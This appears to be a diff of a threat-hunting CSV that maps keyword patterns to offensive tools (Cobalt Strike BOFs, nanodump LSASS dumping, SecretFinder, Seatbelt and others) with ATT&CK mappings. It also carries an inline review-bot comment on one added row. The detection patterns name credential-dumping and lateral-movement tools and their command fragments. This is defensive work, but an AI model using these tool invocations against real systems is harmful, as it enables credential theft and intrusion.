HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts*Search-EventForUser.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ScriptSentry-main.zip*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" 
@@ -16243,19 +16425,20 @@ "*scshellbof.o*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbofx64*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scumjr*dirtycow-vdso*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*Search cached MSI files in C:/Windows/Installer/*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*search_for_secrets(*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Search-cpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - 
T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*searchsploit -m *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*searchsploit -x *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*searchsploit_rc*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*Seatbelt.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" 
-"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*secgroundzero*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sec-inject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.cna*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" 
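Review bot: The added `msi-search` row stores its technique as `"T1005 "` with a trailing space and pairs it with tactics `"TA0007 - TA0003"`, which do not line up. T1005 (Data from Local System) belongs to Collection (TA0009), and the row's own description is about finding MSI-repair privilege-escalation candidates, not persistence. A consumer that splits the technique column on ` - ` and matches IDs exactly would fail to join this row to T1005, so ATT&CK coverage reports built from the list would miss it. I would trim the field to `"T1005"` and revisit the tactic column, for example `"TA0007 - TA0004"` if discovery and privilege escalation are what is meant. The keyword also looks like a sentence from the tool's own help or banner text, yet it carries `metadata_severity_score` `10` with `metadata_comment` `N/A`, so that column could record that the rule only fires where this literal string appears.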
@@ -16263,88 +16446,88 @@ "*secinject.x64*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x86*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject/src*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" -"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. 
sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49197","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" +"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49213","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" "*--seclogon-leak-local*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*--seclogon-leak-remote*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*secrary*","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*secredump.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*secret_fragment_exploit.py */_fragment*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" 